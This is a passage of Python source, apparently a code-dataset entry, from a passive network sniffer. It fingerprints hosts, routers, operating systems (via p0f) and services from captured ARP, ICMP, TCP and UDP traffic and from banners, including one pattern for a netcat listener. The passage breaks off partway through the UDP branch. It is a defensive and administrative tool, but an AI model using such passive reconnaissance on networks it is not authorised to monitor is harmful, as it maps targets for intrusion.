target_list.append(target_dict)\n return target_list", "def processpacket(p):\n\n\tglobal SynSentToTCPService\n\tglobal SynAckSentToTCPClient\n\tglobal LiveTCPService\n\tglobal LiveTCPClient\n\tglobal LiveUDPService\n\tglobal LiveUDPClient\n\tglobal NmapServerDescription\n\tglobal ManualServerDescription\n\tglobal ClientDescription\n\tglobal MacAddr\n\tglobal OSDescription\n\tglobal ServiceFPs\n\tglobal SipPhoneMatch\n\tglobal Devel\n\tglobal IsRouter\n\tglobal DNSRecord\n\tglobal HostIPs\n\n\tif (type(p) == Dot3) and (type(p['LLC']) == LLC):\n\t\tUnhandledPacket(p)\n\t\t#Spanning Tree Protocol\n\t\t#Debug(\"802.3\")\n\t\t#p.show()\n\t\t#print type(p['LLC'])\n\telif (p['Ethernet'] == None):\n\t\tDebug(\"non-ethernet packet\")\t\t#Need more details on how to handle.\n\t\tUnhandledPacket(p)\n\t\t#p.show()\n\t\t#print type(p)\n\t\t#quit()\n\telif p['Ethernet'].type == 0x0806:\t\t#ARP\n\t\t#pull arp data from here instead of tcp/udp packets, as these are all local\n\t\tif (p['ARP'].op == 1):\t\t\t#1 is request (\"who-has\")\n\t\t\tpass\n\t\tif (p['ARP'].op == 2):\t\t\t#2 is reply (\"is-at\")\n\t\t\tif (p['ARP.psrc'] != None) and (p['ARP.hwsrc'] != None):\n\t\t\t\tIPAddr=p['ARP.psrc']\n\t\t\t\tMyMac=p['ARP.hwsrc'].upper()\n\t\t\t\tif (not MacAddr.has_key(IPAddr)) or (MacAddr[IPAddr] != MyMac):\n\t\t\t\t\tReportId(\"MA\", IPAddr, 'Ethernet', MyMac, '')\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 
0x0800:\t\t#IP\n\t\tsIP=str(p['IP'].src)\n\t\tdIP=str(p['IP'].dst)\n\t\t#Best to get these from arps instead; if we get them from here, we get router macs for foreign addresses.\n\t\t#if not MacAddr.has_key(sIP):\n\t\t#\tReportId(\"MA\", sIP, \"Ethernet\", p['Ethernet'].src, '')\n\t\t#if not MacAddr.has_key(dIP):\n\t\t#\tReportId(\"MA\", dIP, \"Ethernet\", p['Ethernet'].dst, '')\n\n\t\tif p['IP'].proto == 1:\t\t\t#ICMP\n\t\t\tType = p['ICMP'].type\n\t\t\tCode = p['ICMP'].code\n\n\t\t\tif (Type == 0):\t\t\t\t\t\t#Echo reply\n\t\t\t\tif (not(OSDescription.has_key(sIP))):\n\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", 'icmp echo reply')\n\t\t\telif (Type == 3) and (type(p[IPerror]) == IPerror):\t#Unreachable, check that we have an actual embedded packet\n\t\t\t\t#if (type(p[IPerror]) != IPerror):\n\t\t\t\t#\tp.show()\n\t\t\t\t#\tprint type(p[IPerror])\n\t\t\t\t#\tquit()\n\t\t\t\tOrigdIP = p[IPerror].dst\n\t\t\t\tif (Code == 0):\t\t\t\t\t#Net unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"NetUn\", \"router\", \"\")\n\t\t\t\telif (Code == 1):\t\t\t\t#Host unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"HostUn\", \"router\", \"\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 17):\t#Port unreachable and embedded protocol = 17, UDP, as it should be\n\t\t\t\t\tDNSServerLoc = p[IPerror].src + \",UDP_53\"\n\t\t\t\t\tif (p[UDPerror].sport == 53) and (ManualServerDescription.has_key(DNSServerLoc)) and (ManualServerDescription[DNSServerLoc] == \"dns/server\"):\n\t\t\t\t\t\t#If orig packet coming from 53 and coming from a dns server, don't do anything (closed port on client is a common effect)\n\t\t\t\t\t\t#Don't waste time on port unreachables going back to a dns server; too common, and ephemeral anyways.\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\t#If orig packet coming from something other than 53, or coming from 53 and NOT coming from a dns server, log as closed\n\t\t\t\t\t\tOrigDPort = str(p[UDPerror].dport)\n\t\t\t\t\t\tOrigDstService = OrigdIP + \",UDP_\" + OrigDPort\n\t\t\t\t\t\tif ((not LiveUDPService.has_key(OrigDstService)) or (LiveUDPService[OrigDstService] == True)):\n\t\t\t\t\t\t\tLiveUDPService[OrigDstService] = False\n\t\t\t\t\t\t\tReportId(\"US\", OrigdIP, \"UDP_\" + OrigDPort, \"closed\", \"port unreachable\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 6) and (p[TCPerror].dport == 113):\t#Port unreachable and embedded protocol = 6, TCP, which it shouldn't. May be the same firewall providing the TCP FR's\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 6):\t\t\t\t#Net unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unknown')\n\t\t\t\telif (Code == 7):\t\t\t\t#Host unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unknown')\n\t\t\t\telif (Code == 9):\t\t\t\t#Network Administratively Prohibited\n\t\t\t\t\tpass\t\t\t\t\t#Can't tell much from this type of traffic. 
Possibly list as firewall?\n\t\t\t\telif (Code == 10):\t\t\t\t#Host Administratively Prohibited\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 11):\t\t\t\t#Network unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 12):\t\t\t\t#Host unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 13):\t\t\t\t#Communication Administratively prohibited\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (Type == 8):\t\t\t\t\t#ping\n\t\t\t\t#FIXME - check payload for ping sender type, perhaps\n\t\t\t\tpass\n\t\t\telif (Type == 11):\t\t\t\t\t#Time exceeded\n\t\t\t\tif (Code == 0):\t\t\t\t\t#TTL exceeded\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\t#FIXME - put original target IP as column 5?\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"TTLEx\", \"router\", \"\")\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 2:\t\t#IGMP\n\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 6:\t\t#TCP\n\t\t\tsport=str(p['TCP'].sport)\n\t\t\tdport=str(p['TCP'].dport)\n\t\t\t#print p['IP'].src + \":\" + sport + \" -> \", p['IP'].dst + \":\" + dport,\n\t\t\tif (p['TCP'].flags & 0x17) == 0x12:\t#SYN/ACK (RST and FIN off)\n\t\t\t\tCliService = dIP + \",TCP_\" + sport\n\t\t\t\tif not SynAckSentToTCPClient.has_key(CliService):\n\t\t\t\t\tSynAckSentToTCPClient[CliService] = True\n\n\t\t\t\t#If we've seen a syn sent to this port and have either not seen any SA/R, or we've seen a R in the past:\n\t\t\t\t#The last test is for a service that was previously closed and is now open; report each transition once.\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == False)) ):\n\t\t\t\t\tLiveTCPService[Service] = True\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", '')\n\t\t\telif (p['TCP'].flags & 0x17) == 0x02:\t#SYN (ACK, RST, and FIN off)\n\t\t\t\tService = dIP + \",TCP_\" + dport\n\t\t\t\tif not SynSentToTCPService.has_key(Service):\n\t\t\t\t\tSynSentToTCPService[Service] = True\n\t\t\t\t#Debug(\"trying to fingerprint \" + sIP)\n\t\t\t\ttry:\n\t\t\t\t\tp0fdata = p0f(p)\n\t\t\t\t\t#FIXME - reasonably common occurence, don't whine, just fix it.\n\t\t\t\t\t#if (len(p0fdata) >1):\n\t\t\t\t\t#\tDebug(\"More than one OS fingerprint for \" + sIP + \", using the first.\")\n\t\t\t\t\tif (len(p0fdata) >=1):\n\t\t\t\t\t\tPDescription = p0fdata[0][0] + \" \" + p0fdata[0][1] + \" (\" + str(int(p0fdata[0][2]) + 1)\t#FIXME - Grabbing just the first candidate, may need to compare correlation values; provided?\n\t\t\t\t\t\tif (p0fdata[0][2] == 0):\n\t\t\t\t\t\t\tPDescription = PDescription + \" hop away)\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tPDescription = PDescription + \" hops away)\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t#[N][2] param appears to be distance away in hops (but add 1 to this to get real hop count?)\n\t\t\t\t\t\tPDescription = PDescription.replace(',', ';')\t\t#Commas are delimiters in output\n\t\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\t\texcept:\n\t\t\t\t\tPDescription = 'p0f failure'\n\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\tDebug(\"P0f failure in \" + sIP + \":\" + sport + \" -> \" + dIP + \":\" + dport)\n\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", 
\"live\", PDescription)\n\t\t\telif (p['TCP'].flags & 0x07) == 0x01:\t#FIN (SYN/RST off)\n\t\t\t\tCliService = sIP + \",TCP_\" + dport\n\t\t\t\tif ( (SynAckSentToTCPClient.has_key(CliService)) and ((not LiveTCPClient.has_key(CliService)) or (LiveTCPClient[CliService] == False)) ):\n\t\t\t\t\tLiveTCPClient[CliService] = True\n\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", '')\n\t\t\telif (p['TCP'].flags & 0x07) == 0x04:\t#RST (SYN and FIN off)\n\t\t\t\t#FIXME - handle rst going in the other direction?\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == True)) ):\n\t\t\t\t\tLiveTCPService[Service] = False\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"closed\", '')\n\t\t\telif ((p['TCP'].flags & 0x3F) == 0x15) and (sport == \"113\"):\t#FIN, RST, ACK (SYN, PSH, URG off)\n\t\t\t\t#This may be a firewall or some other device stepping in for 113 with a FIN/RST.\n\t\t\t\tpass\n\t\t\telif (p['TCP'].flags & 0x17) == 0x10:\t#ACK (RST, SYN, and FIN off)\n\t\t\t\t#FIXME - check for UnhandledPacket placement in ACK\n\t\t\t\tFromPort = sIP + \",TCP_\" + sport\n\t\t\t\tToPort = dIP + \",TCP_\" + dport\n\t\t\t\tPayload = str(p['Raw.load'])\t\t\t#For some reason this doesn't handle p['Raw'].load\n\t\t\t\tif ( (LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True) and (LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\n\t\t\t\t\tprint \"Logic failure: both \" + FromPort + \" and \" + ToPort + \" are listed as live services.\"\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\telif ((LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True)):\t#If the \"From\" side is a known TCP server:\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort) ):\t\t#Check nmap fingerprint strings for this server port\n\t\t\t\t\t\tif (ServiceFPs.has_key(int(sport))):\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs[int(sport)]:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\t#Debugging:\n\t\t\t\t\t\t\t\t\t#FIXME - removeme once understood:\n\t\t\t\t\t\t\t\t\t#File \"/home/wstearns/med/programming/python/passer/passer.py\", line 504, in processpacket\n\t\t\t\t\t\t\t\t\t#OutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\t#TypeError: expected a character buffer object\n\t\t\t\t\t\t\t\t\tif (OneTuple[1] == None):\n\t\t\t\t\t\t\t\t\t\tDebug(\"Null description for \" + OneTuple[0])\n\t\t\t\t\t\t\t\t\t\t#quit()\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\t#Example: Replace \"$1\" with MatchObj.group(1)\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), str(MatchObj.group(Index)))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t#Exit for loop, no need to check any more fingerprints now that we've found a match\n\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort)):\t\t#If the above loop didn't find a server description\n\t\t\t\t\t\tif (ServiceFPs.has_key('all')):\t\t\t\t#Now recheck 
against regexes not associated with a specific port (port 'all').\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs['all']:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif (not ManualServerDescription.has_key(FromPort) ):\n\t\t\t\t\t\tif (sport == \"22\") and (Payload != None) and (Payload.find('SSH-') > -1):\n\t\t\t\t\t\t\tif ( (Payload.find('SSH-1.99-OpenSSH_') > -1) or (Payload.find('SSH-2.0-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/openssh\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/openssh\"\n\t\t\t\t\t\t\telif (Payload.find('SSH-1.5-') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/generic\"\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' ESMTP Sendmail ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/sendmail\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/sendmail\"\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' - Welcome to our SMTP server ESMTP') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t#Check for port 80 and search for \"Server: \" once\n\t\t\t\t\t\telif (sport == \"80\") and (Payload != None) and (Payload.find('Server: ') > -1):\n\t\t\t\t\t\t\tif (Payload.find('Server: Apache') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/apache\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/apache\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Embedded HTTP Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/embedded\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/embedded\"\n\t\t\t\t\t\t\telif (Payload.find('Server: gws') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/gws\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/gws\"\n\t\t\t\t\t\t\telif (Payload.find('Server: KFWebServer') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/kfwebserver\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/kfwebserver\"\n\t\t\t\t\t\t\telif (Payload.find('Server: micro_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + 
sport, \"listening\", \"http/micro-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/micro-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Microsoft-IIS') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/iis\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/iis\"\n\t\t\t\t\t\t\telif (Payload.find('Server: lighttpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/lighttpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/lighttpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: MIIxpc') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mirrorimage\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mirrorimage\"\n\t\t\t\t\t\t\telif (Payload.find('Server: mini_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mini-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mini-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nc -l -p 80') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nc\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nc\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nginx/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nginx\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nginx\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Nucleus') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nucleus\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nucleus\"\n\t\t\t\t\t\t\telif (Payload.find('Server: RomPager') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/rompager\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/rompager\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/server\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/server\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Sun-ONE-Web-Server/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/sun-one\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/sun-one\"\n\t\t\t\t\t\t\telif (Payload.find('Server: TrustRank Frontend') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/trustrank\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/trustrank\"\n\t\t\t\t\t\t\telif (Payload.find('Server: YTS/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/yahoo\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/yahoo\"\n\t\t\t\t\t\t\telif (Payload.find('HTTP/1.0 404 Not Found') > -1) or (Payload.find('HTTP/1.1 200 OK') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/generic\"\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"110\") and (Payload != None) 
and (Payload.find('POP3 Server Ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"pop3/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"pop3/generic\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find('* OK dovecot ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/dovecot\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/dovecot\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find(' IMAP4rev1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"783\") and (Payload != None) and (Payload.find('SPAMD/1.1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"spamd/spamd\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"spamd/spamd\"\n\t\t\t\t\t\telif ( (sport == \"3128\") or (sport == \"80\") ) and (Payload != None) and (Payload.find('Via: ') > -1) and (Payload.find(' (squid/') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"proxy/squid\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"proxy/squid\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\telif ((LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\t\t#If the \"To\" side is a known TCP server:\n\t\t\t\t\tClientKey = sIP + \",TCP_\" + dport\t#Note: CLIENT ip and SERVER port\n\t\t\t\t\tif (not ClientDescription.has_key(ClientKey)):\n\t\t\t\t\t\tif (dport == \"22\") and (Payload != None) and ( (Payload.find('SSH-2.0-OpenSSH_') > -1) or (Payload.find('SSH-1.5-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"ssh/openssh\")\n\t\t\t\t\t\t#As cute as it is to catch this, it miscatches any relay that's carrying a pine-generated mail.\n\t\t\t\t\t\t#elif (dport == \"25\") and (Payload != None) and (Payload.find('Message-ID: <Pine.') > -1):\n\t\t\t\t\t\t#\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"smtp/pine\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: libwww-perl/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/libwww-perl\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Lynx') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/lynx\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Mozilla') > -1) and (Payload.find(' Firefox/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/firefox\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Wget/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/wget\")\n\t\t\t\t\t\telif (dport == \"143\") and (Payload != None) and (Payload.find('A0001 CAPABILITY') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"imap/generic\")\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\t\t\telif (dport 
== \"783\") and (Payload != None) and (Payload.find('PROCESS SPAMC') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"spamd/spamc\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\telse:\t#Neither port pair is known as a server\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t#Following is debugging at best; it should only show up early on as the sniffer listens to conversations for which it didn't hear the SYN/ACK\n\t\t\t\t\t#print \"note: neither \" + FromPort + \" nor \" + ToPort + \" is listed as a live service.\"\n\t\t\telse:\t#Other TCP flag combinations here\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 17 and (type(p['UDP']) == UDP):\t\t#UDP. We have to check the object type as well as we do get (corrupted? truncated?) packets with type 17 that aren't udp: AttributeError: 'NoneType' object has no attribute 'sport'\n\t\t\t#FIXME - possibly run udp packets through ServiceFPs as well?\n\t\t\tsport=str(p['UDP'].sport)\n\t\t\tdport=str(p['UDP'].dport)\n\t\t\tSrcService = sIP + \",UDP_\" + sport\n\t\t\tDstService = dIP + \",UDP_\" + dport\n\t\t\tSrcClient = sIP + \",UDP_\" + dport\n\t\t\tPayload = p['Raw.load']\n\n\t\t\t#Multicast DNS: http://files.multicastdns.org/draft-cheshire-dnsext-multicastdns.txt\n\t\t\t#- usually sent to 224.0.0.251 (or FF02::FB) (link-local multicast).\n\t\t\t#\t- if \".local.\" in query, these MUST be the target IPs\n\t\t\t#\t- non-local queries may be sent to these or normal dns servers\n\t\t\t#\t- rdns queries for \"254.169.in-addr.arpa.\" MUST be sent to 224.0.0.251\n\t\t\t#\t- rdns queries for \"8.e.f.ip6.arpa.\", \"9.e.f.ip6.arpa.\",\"a.e.f.ip6.arpa.\", and \"b.e.f.ip6.arpa.\" MUST be sent to the IPv6 mDNS link-local multicast address FF02::FB.\n\t\t\t#- sent to udp port 5353\n\t\t\t#- generic clients may use \"single-dns-object.local.\", such as \"sparrow.local.\"\n\t\t\t#- responses have IP TTL = 255 to check that packet originated on-lan\n\n\t\t\t#Multicast DNS, placed next to normal dns, out of numerical order\n\t\t\tif (dport == \"5353\") and ( (p['IP'].ttl == 1) or (p['IP'].ttl == 255) ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcClient)) or (LiveUDPService[SrcClient] == False)):\n\t\t\t\t\tLiveUDPService[SrcClient] = 